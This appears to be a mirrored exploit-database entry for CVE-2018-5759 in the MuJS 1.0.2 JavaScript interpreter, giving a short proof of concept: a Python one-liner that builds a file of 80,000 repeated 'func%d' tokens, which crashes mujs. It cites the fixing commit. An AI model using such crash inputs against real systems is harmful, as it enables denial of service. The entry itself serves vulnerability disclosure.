Artifex MuJS 1.0.2 – Integer Overflow

  • 作者: Andrea Sindoni
    日期: 2018-01-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43904/
  • # Exploit Title: DoS caused by the interactive call between two functions
    # Date: 2018-01-16
    # Exploit Author: Andrea Sindoni - @invictus1306
    # Vendor: Artifex (https://www.artifex.com/)
    # Software Link: https://github.com/ccxvii/mujs
    # Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
    # Tested on: Linux
    # CVE : CVE-2018-5759
    
    Simple poc:
    # python -c "print 'func%d'*80000" > poc.js
    # mujs poc.js
    
    Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1 (
    http://git.ghostscript.com/?p=mujs.git;a=commit;h=4d45a96e57fbabf00a7378b337d0ddcace6f38c1
    )